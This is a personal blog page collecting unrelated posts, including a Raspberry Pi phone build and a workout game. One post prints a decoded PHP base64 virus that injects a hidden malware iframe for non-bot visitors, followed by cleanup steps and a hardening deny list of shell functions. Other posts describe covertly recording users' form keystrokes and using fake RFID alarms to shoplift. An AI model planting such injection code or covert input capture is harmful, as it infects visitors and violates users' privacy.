Spyjax 2.0: Input history

When your typing in some text you’ll always make some kind of mistake.
Or maybe you’ll copy past something and then replace a few words. Maybe It’s not your text but you can replace some of the references and make it yours, nobody knows, right?

Or do they…

Using javascript we can record everything the user typed πŸ˜›
I’ve mentioned this in a previous post.

I’ve made a quick demo: http://ict-blue.be/qwaxys/projects/replay/.

When you hit submit on the demo, you’ll see the result. In reality you won’t. I would just use the last text as what I need (a comment, review, solicitation?) and store the complete history in a database.

Then anytime I want (or somebody else, perhaps the future employer..) It’s just a matter of replaying that data.

Just imagine the possibilities…

Advertisements

Pi – Phone

Recently I boughty myself a Raspberry Pi.
And today it was Retro Beurs (a sort of flea market) so I said to myself: go find something to mount the Pi in.
I had only 3 requirements:

  • The Pi should fit inside. (duh)
  • It’s gotta be cheap.
  • It should look awesome.

This is the result:
phone
I think it looks pretty awesome πŸ˜›

After opening up I discovered I got exactly what I needed and nothing more. The phone itself wasn’t there. Neither were the speaker or microphone.
phone2
So much room for activities πŸ˜€

My ideas so far:

  • Get the dialler working with the gpio pins.
  • Get a USB microphone.
  • Build microphone and speaker into the horn.
  • Do some research on Skype, Google talk, SIP, etc
  • Configuration and programming hell. πŸ˜›

Sabam: Oh no you didn’t!

They did.

For the ones who don’t speak Dutch: Sabam is the RIAA for Belgium.
They just gave me a reply with a list of their prices πŸ˜›


Evil IT stuff

Disclaimer

Some of these ideas are great, some are funny and others are horrific and plain wrong.
I’m not saying you should, I’m just saying you could.
These are just some random ideas about what you can do with current technology.

Social annoyance

Make a website that uses Facebook connect.
When the site is open, at random times quietly whisper the users first name.

variant:

Make a smartphone app that actually has a purpose.
At random times make the phone vibrate or play the default ringtone/new text tone.

Shopping spree

Make yourself an active high powered RFID tag.
Go sit across the shop and make the alarm go off every time somebody exits the shop.
Once they are sick of checking every person leaving the shop, it’s time to go shopping!

Capture somebody’s previous input

If you have a webform, you can receive the input the user has submitted.
But what about the loose ideas or copy pasts?
Well we can just bind an event to every input, save every action into local storage.
When the form is submit we add a hidden field with the form history and then continue to submit the form.


More soonish.


The Rocky Workout

Yesterday, this is what I tweeted:

And so I did.

I’ve added the song 10 times. There are 435 tracks on my iPod.

I’m not sure how really random the iPod Shuffle algorithm is but according to my calculations the chances of having to workout is around 2.299%. That seems very reasonable πŸ˜›

Note that the workout isn’t limited to the length of the song. The song is there to get you started!

So far:

I had a little jog

I did pull-ups in the tram (top right)
Tram

I postponed my surprise workout for practical reasons at work until my lunch break (before eating) to go run up and down (once) the stairs of K12.
K12_UZ_Gent

And more will be posted soonish.


PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:


<?php
    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7"; 
    eval(base64_decode($script));
    @eval(gzinflate(base64_decode($virusaworm)));
?>

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    ...
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <ΙFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></ΙFRAME>
        </div>';
}

This means that all the pages with this code contain an invisible iframe but only when the user isn’t a bot.
That page in the iframe contains malware infecting the user.

How do we get rid of it?

in your webroot put a .htaccess file with the following content:
order deny,allow
deny from all
allow from 127.0.0.1

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php (locally).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove the functions you do need, for example some template systems use eval().

Change your file permissions!

Install and configure suhosin. You can whitelist functions inside eval() so functions like base64_decode are never allowed to execute.
In that case even when some bot managed to upload the payload, it cannot be executed correctly.

 

Interesting readings

http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html
http://www.webdigi.co.uk/blog/2009/how-to-detect-if-your-webserver-is-hacked-and-get-alerted/


Achievement generator

There used to be a very pretty achievements generator at http://teamfortress2.fr/achievements.php?eng

But apparently it broke because of some missing JavaScript and CSS files.

Using archive.org I’ve managed to get those files.

Then I crammed everything together in one HTML file πŸ™‚

http://pastehtml.com/view/cp27dx5ly.html

Mirror: http://ict-blue.be/qwaxys/projects/TF2-achievements/

Enjoy!

PS: you can just copy the HTML and run it locally or host it yourself πŸ˜‰